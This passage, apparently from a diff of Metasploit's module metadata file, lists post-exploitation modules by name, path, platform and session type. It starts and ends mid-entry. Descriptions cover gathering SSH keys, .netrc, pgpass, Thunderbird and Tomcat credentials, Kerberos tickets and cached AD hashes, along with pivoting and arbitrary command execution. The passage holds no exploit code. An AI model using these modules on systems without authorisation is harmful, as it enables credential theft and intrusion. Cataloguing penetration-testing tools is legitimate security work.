"Linux,OSX,Unix,Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-24 19:55:53 +0000", + "path": "/modules/post/multi/gather/memory_search.rb", + "is_install_path": true, + "ref_name": "multi/gather/memory_search", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/minio_client": { + "name": "Gather MinIO Client Key", + "fullname": "post/multi/gather/minio_client", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kali-Team " + ], + 
"description": "This module searches for MinIO Client credentials on a Windows host.", + "references": [ + "URL-https://blog.kali-team.cn/Metasploit-MinIO-Client-7d940c60ae8545aeaa29c96536dda855" + ], + "platform": "Linux,OSX,Unix,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-13 09:23:28 +0000", + "path": "/modules/post/multi/gather/minio_client.rb", + "is_install_path": true, + "ref_name": "multi/gather/minio_client", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter", + "powershell", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/multi_command": { + "name": "Multi Gather Run Shell Command Resource File", + "fullname": "post/multi/gather/multi_command", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Carlos Perez " + ], + "description": "This module will read shell commands from a resource file and\n execute the commands in the specified Meterpreter or shell session.", + "references": [], + "platform": "BSD,Linux,OSX,Unix,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/multi_command.rb", + "is_install_path": true, + "ref_name": "multi/gather/multi_command", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/netrc_creds": { + "name": "UNIX Gather .netrc Credentials", + "fullname": "post/multi/gather/netrc_creds", + "aliases": [], + "rank": 300, + "disclosure_date": null, 
+ "type": "post", + "author": [ + "Jon Hart " + ], + "description": "Post Module to obtain credentials saved for FTP and other services in .netrc", + "references": [], + "platform": "BSD,Linux,OSX,Unix", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/netrc_creds.rb", + "is_install_path": true, + "ref_name": "multi/gather/netrc_creds", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/pgpass_creds": { + "name": "Multi Gather pgpass Credentials", + "fullname": "post/multi/gather/pgpass_creds", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Zach Grace " + ], + "description": "This module will collect the contents of all users' .pgpass or pgpass.conf\n file and parse them for credentials.", + "references": [], + "platform": "BSD,Linux,OSX,Unix,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/pgpass_creds.rb", + "is_install_path": true, + "ref_name": "multi/gather/pgpass_creds", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/pidgin_cred": { + "name": "Multi Gather Pidgin Instant Messenger Credential Collection", + "fullname": "post/multi/gather/pidgin_cred", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "bannedit ", + "Carlos Perez " + ], 
+ "description": "This module will collect credentials from the Pidgin IM client if it is installed.", + "references": [], + "platform": "BSD,Linux,OSX,Unix,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/pidgin_cred.rb", + "is_install_path": true, + "ref_name": "multi/gather/pidgin_cred", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/ping_sweep": { + "name": "Multi Gather Ping Sweep", + "fullname": "post/multi/gather/ping_sweep", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Carlos Perez " + ], + "description": "Performs IPv4 ping sweep using the OS included ping command.", + "references": [], + "platform": "BSD,Linux,OSX,Solaris,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/ping_sweep.rb", + "is_install_path": true, + "ref_name": "multi/gather/ping_sweep", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/remmina_creds": { + "name": "UNIX Gather Remmina Credentials", + "fullname": "post/multi/gather/remmina_creds", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Jon Hart " + ], + "description": "Post module to obtain credentials saved for RDP and VNC from Remmina's configuration files.\n These are 
encrypted with 3DES using a 256-bit key generated by Remmina which is (by design)\n stored in (relatively) plain text in a file that must be properly protected.", + "references": [], + "platform": "BSD,Linux,OSX,Unix", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/remmina_creds.rb", + "is_install_path": true, + "ref_name": "multi/gather/remmina_creds", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/resolve_hosts": { + "name": "Multi Gather Resolve Hosts", + "fullname": "post/multi/gather/resolve_hosts", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Ben Campbell " + ], + "description": "Resolves hostnames to either IPv4 or IPv6 addresses from the perspective of the remote host.", + "references": [], + "platform": "Python,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/resolve_hosts.rb", + "is_install_path": true, + "ref_name": "multi/gather/resolve_hosts", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/rsyncd_creds": { + "name": "UNIX Gather RSYNC Credentials", + "fullname": "post/multi/gather/rsyncd_creds", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Jon Hart " + ], + "description": "Post Module to obtain credentials 
saved for RSYNC in various locations", + "references": [], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/rsyncd_creds.rb", + "is_install_path": true, + "ref_name": "multi/gather/rsyncd_creds", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/rubygems_api_key": { + "name": "Multi Gather RubyGems API Key", + "fullname": "post/multi/gather/rubygems_api_key", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Jonathan Claudius ", + "Brandon Myers " + ], + "description": "This module obtains a user's RubyGems API key from ~/.gem/credentials.", + "references": [], + "platform": "BSD,Linux,OSX,Unix", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/rubygems_api_key.rb", + "is_install_path": true, + "ref_name": "multi/gather/rubygems_api_key", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/run_console_rc_file": { + "name": "Multi Gather Run Console Resource File", + "fullname": "post/multi/gather/run_console_rc_file", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Carlos Perez " + ], + "description": "This module will read console commands from a resource file and\n execute the commands in the specified Meterpreter session.", + "references": [], + 
"platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/run_console_rc_file.rb", + "is_install_path": true, + "ref_name": "multi/gather/run_console_rc_file", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/saltstack_salt": { + "name": "SaltStack Salt Information Gatherer", + "fullname": "post/multi/gather/saltstack_salt", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "h00die", + "c2Vlcgo" + ], + "description": "This module gathers information from SaltStack Salt masters and minions.\n Data gathered from minions: 1. salt minion config file\n Data gathered from masters: 1. minion list (denied, pre, rejected, accepted)\n 2. minion hostname/ip/os (depending on module settings)\n 3. SLS\n 4. roster, any SSH keys are retrieved and saved to creds, SSH passwords printed\n 5. minion config files\n 6. 
pillar data", + "references": [], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-07-24 16:42:43 +0000", + "path": "/modules/post/multi/gather/saltstack_salt.rb", + "is_install_path": true, + "ref_name": "multi/gather/saltstack_salt", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/skype_enum": { + "name": "Multi Gather Skype User Data Enumeration", + "fullname": "post/multi/gather/skype_enum", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Carlos Perez " + ], + "description": "This module will enumerate Skype account settings, contact list, call history, chat logs,\n file transfer history, and voicemail logs, saving all the data to CSV files for analysis.", + "references": [], + "platform": "OSX,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/skype_enum.rb", + "is_install_path": true, + "ref_name": "multi/gather/skype_enum", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/ssh_creds": { + "name": "Multi Gather OpenSSH PKI Credentials Collection", + "fullname": "post/multi/gather/ssh_creds", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Jim Halfpenny" + ], + "description": "This module will collect the contents of all users' .ssh 
directories on the targeted\n machine. Additionally, known_hosts and authorized_keys and any other files are also\n downloaded. This module is largely based on firefox_creds.rb.", + "references": [], + "platform": "BSD,Linux,OSX,Unix", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/ssh_creds.rb", + "is_install_path": true, + "ref_name": "multi/gather/ssh_creds", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/thunderbird_creds": { + "name": "Multi Gather Mozilla Thunderbird Signon Credential Collection", + "fullname": "post/multi/gather/thunderbird_creds", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "sinn3r " + ], + "description": "This module will collect credentials from Mozilla Thunderbird by downloading\n the necessary files such as 'signons.sqlite', 'key3.db', and 'cert8.db' for\n offline decryption with third party tools.\n\n If necessary, you may also set the PARSE option to true to parse the sqlite\n file, which contains sensitive information such as the encrypted username/password.\n However, this feature is not enabled by default, because it requires SQLITE3 gem\n to be installed on your machine.", + "references": [], + "platform": "Linux,OSX,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/thunderbird_creds.rb", + "is_install_path": true, + "ref_name": "multi/gather/thunderbird_creds", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": 
[ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/tomcat_gather": { + "name": "Gather Tomcat Credentials", + "fullname": "post/multi/gather/tomcat_gather", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Koen Riepe " + ], + "description": "This module will attempt to collect credentials from Tomcat services running on the machine.", + "references": [], + "platform": "Linux,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/tomcat_gather.rb", + "is_install_path": true, + "ref_name": "multi/gather/tomcat_gather", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/ubiquiti_unifi_backup": { + "name": "Multi Gather Ubiquiti UniFi Controller Backup", + "fullname": "post/multi/gather/ubiquiti_unifi_backup", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "h00die", + "zhangyoufu", + "justingist" + ], + "description": "On an Ubiquiti UniFi controller, reads the system.properties configuration file\n and downloads the backup and autobackup files. The files are then decrypted using\n a known encryption key, then attempted to be repaired by zip. 
Meterpreter must be\n used due to the large file sizes, which can be flaky on regular shells to read.\n Confirmed to work on 5.10.19 - 5.10.23, but most likely quite a bit more.\n If the zip can be repaired, the db and its information will be extracted.", + "references": [ + "URL-https://github.com/zhangyoufu/unifi-backup-decrypt/", + "URL-https://github.com/justingist/POSH-Ubiquiti/blob/master/Posh-UBNT.psm1", + "URL-https://help.ubnt.com/hc/en-us/articles/205202580-UniFi-system-properties-File-Explanation", + "URL-https://community.ubnt.com/t5/UniFi-Wireless/unf-controller-backup-file-format/td-p/1624105" + ], + "platform": "Linux,OSX,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/ubiquiti_unifi_backup.rb", + "is_install_path": true, + "ref_name": "multi/gather/ubiquiti_unifi_backup", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/unix_cached_ad_hashes": { + "name": "UNIX Gather Cached AD Hashes", + "fullname": "post/multi/gather/unix_cached_ad_hashes", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Tim Brown " + ], + "description": "Post Module to obtain all cached AD hashes on the targeted UNIX machine. 
These can be cracked with John the Ripper (JtR).", + "references": [], + "platform": "AIX,Linux,OSX,Solaris,Unix", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-02-03 18:12:53 +0000", + "path": "/modules/post/multi/gather/unix_cached_ad_hashes.rb", + "is_install_path": true, + "ref_name": "multi/gather/unix_cached_ad_hashes", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/unix_kerberos_tickets": { + "name": "UNIX Gather Kerberos Tickets", + "fullname": "post/multi/gather/unix_kerberos_tickets", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Tim Brown " + ], + "description": "Post Module to obtain all kerberos tickets on the targeted UNIX machine.", + "references": [], + "platform": "AIX,Linux,OSX,Solaris,Unix", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-02-03 18:12:53 +0000", + "path": "/modules/post/multi/gather/unix_kerberos_tickets.rb", + "is_install_path": true, + "ref_name": "multi/gather/unix_kerberos_tickets", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/wlan_geolocate": { + "name": "Multiplatform WLAN Enumeration and Geolocation", + "fullname": "post/multi/gather/wlan_geolocate", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Tom Sellers " + ], + "description": "Enumerate wireless networks 
visible to the target device.\n Optionally geolocate the target by gathering local wireless networks and\n performing a lookup against Google APIs.", + "references": [], + "platform": "Android,BSD,Linux,OSX,Solaris,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-13 09:23:28 +0000", + "path": "/modules/post/multi/gather/wlan_geolocate.rb", + "is_install_path": true, + "ref_name": "multi/gather/wlan_geolocate", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/wowza_streaming_engine_creds": { + "name": "Gather Wowza Streaming Engine Credentials", + "fullname": "post/multi/gather/wowza_streaming_engine_creds", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "bcoles " + ], + "description": "This module collects Wowza Streaming Engine user credentials.", + "references": [ + "URL-https://www.wowza.com/docs/use-http-providers-with-the-wowza-streaming-engine-java-api", + "URL-https://www.wowza.com/resources/WowzaStreamingEngine_UsersGuide-4.0.5.pdf" + ], + "platform": "Linux,OSX,Unix,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-13 09:23:28 +0000", + "path": "/modules/post/multi/gather/wowza_streaming_engine_creds.rb", + "is_install_path": true, + "ref_name": "multi/gather/wowza_streaming_engine_creds", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter", + "powershell", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/general/close": 
{ + "name": "Multi Generic Operating System Session Close", + "fullname": "post/multi/general/close", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "hdm " + ], + "description": "This module closes the specified session. This can be useful as a finisher for automation tasks.", + "references": [], + "platform": "Linux,OSX,Unix,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-13 09:23:28 +0000", + "path": "/modules/post/multi/general/close.rb", + "is_install_path": true, + "ref_name": "multi/general/close", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-service-down" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/general/execute": { + "name": "Multi Generic Operating System Session Command Execution", + "fullname": "post/multi/general/execute", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "hdm " + ], + "description": "This module executes an arbitrary command line", + "references": [], + "platform": "Linux,OSX,Unix,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:32:23 +0000", + "path": "/modules/post/multi/general/execute.rb", + "is_install_path": true, + "ref_name": "multi/general/execute", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/general/wall": { + "name": "Write Messages to Users", + "fullname": "post/multi/general/wall", + "aliases": [], + "rank": 300, + 
"disclosure_date": null, + "type": "post", + "author": [ + "Jon Hart " + ], + "description": "This module utilizes the wall(1) or write(1) utilities, as appropriate,\n to send messages to users on the target system.", + "references": [], + "platform": "Linux,OSX,Unix", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:32:23 +0000", + "path": "/modules/post/multi/general/wall.rb", + "is_install_path": true, + "ref_name": "multi/general/wall", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "screen-effects" + ], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/manage/autoroute": { + "name": "Multi Manage Network Route via Meterpreter Session", + "fullname": "post/multi/manage/autoroute", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "todb ", + "Josh Hale \"sn0wfa11\" " + ], + "description": "This module manages session routing via an existing\n Meterpreter session. It enables other modules to 'pivot' through a\n compromised host when connecting to the named NETWORK and SUBMASK.\n Autoadd will search a session for valid subnets from the routing table\n and interface list then add routes to them. Default will add a default\n route so that all TCP/IP traffic not specified in the MSF routing table\n will be routed through the session when pivoting. 
See documentation for more\n 'info -d' and click 'Knowledge Base'", + "references": [], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:32:23 +0000", + "path": "/modules/post/multi/manage/autoroute.rb", + "is_install_path": true, + "ref_name": "multi/manage/autoroute", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/manage/dbvis_add_db_admin": { + "name": "Multi Manage DbVisualizer Add Db Admin", + "fullname": "post/multi/manage/dbvis_add_db_admin", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "David Bloom" + ], + "description": "Dbvisulaizer offers a command line functionality to execute SQL pre-configured databases\n (With GUI). The remote database can be accessed from the command line without the need\n to authenticate, which can be abused to create an administrator in the database with the\n proper database permissions. 
Note: This module currently only supports MySQL.", + "references": [ + "URL-http://youtu.be/0LCLRVHX1vA" + ], + "platform": "Linux,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:32:23 +0000", + "path": "/modules/post/multi/manage/dbvis_add_db_admin.rb", + "is_install_path": true, + "ref_name": "multi/manage/dbvis_add_db_admin", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "config-changes" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/manage/dbvis_query": { + "name": "Multi Manage DbVisualizer Query", + "fullname": "post/multi/manage/dbvis_query", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "David Bloom" + ], + "description": "Dbvisulaizer offers a command line functionality to execute SQL pre-configured databases\n (With GUI). 
The remote database can be accessed from the command line without the need\n to authenticate, and this module abuses this functionality to query and will store the\n results.\n\n Please note: backslash quotes and your (stacked or not) queries should\n end with a semicolon.", + "references": [ + "URL-http://youtu.be/0LCLRVHX1vA" + ], + "platform": "Linux,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:32:23 +0000", + "path": "/modules/post/multi/manage/dbvis_query.rb", + "is_install_path": true, + "ref_name": "multi/manage/dbvis_query", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/manage/fileshare": { + "name": "Browse the session filesystem in a Web Browser", + "fullname": "post/multi/manage/fileshare", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "timwr" + ], + "description": "This module allows you to browse the session filesystem via a local\n browser window.", + "references": [], + "platform": "Linux,OSX,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2021-10-25 17:19:45 +0000", + "path": "/modules/post/multi/manage/fileshare.rb", + "is_install_path": true, + "ref_name": "multi/manage/fileshare", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Reliability": [], + "SideEffects": [], + "Stability": [ + "crash-safe" + ] + }, + "session_types": [ + "meterpreter", + "shell", + "powershell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/manage/hsts_eraser": { + "name": "Web browsers HSTS entries eraser", + "fullname": "post/multi/manage/hsts_eraser", + 
"aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Sheila A. Berta (UnaPibaGeek)" + ], + "description": "This module removes the HSTS database of the following tools and web browsers: Mozilla Firefox,\n Google Chrome, Opera, Safari and wget.", + "references": [ + "URL-http://blog.en.elevenpaths.com/2017/12/breaking-out-hsts-and-hpkp-on-firefox.html", + "URL-https://www.blackhat.com/docs/eu-17/materials/eu-17-Berta-Breaking-Out-HSTS-And-HPKP-On-Firefox-IE-Edge-And-Possibly-Chrome.pdf" + ], + "platform": "Linux,OSX,Unix,Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:32:23 +0000", + "path": "/modules/post/multi/manage/hsts_eraser.rb", + "is_install_path": true, + "ref_name": "multi/manage/hsts_eraser", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "config-changes" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/manage/multi_post": { + "name": "Multi Manage Post Module Macro Execution", + "fullname": "post/multi/manage/multi_post", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "carlos_perez " + ], + "description": "This module will execute a list of modules given in a macro file in the format\n of against the select session checking for compatibility\n of the module against the sessions and validation of the options provided.", + "references": [], + "platform": "Linux,OSX,Solaris,Unix,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:32:23 +0000", + "path": "/modules/post/multi/manage/multi_post.rb", + "is_install_path": true, + "ref_name": "multi/manage/multi_post", + "check": false, + 
"post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "config-changes" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/manage/open": { + "name": "Open a file or URL on the target computer", + "fullname": "post/multi/manage/open", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Eliott Teissonniere" + ], + "description": "This module will open any file or URL specified with the URI format on the\n target computer via the embedded commands such as 'open' or 'xdg-open'.", + "references": [], + "platform": "Linux,OSX,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:32:23 +0000", + "path": "/modules/post/multi/manage/open.rb", + "is_install_path": true, + "ref_name": "multi/manage/open", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "screen-effects" + ], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/manage/play_youtube": { + "name": "Multi Manage YouTube Broadcast", + "fullname": "post/multi/manage/play_youtube", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "sinn3r " 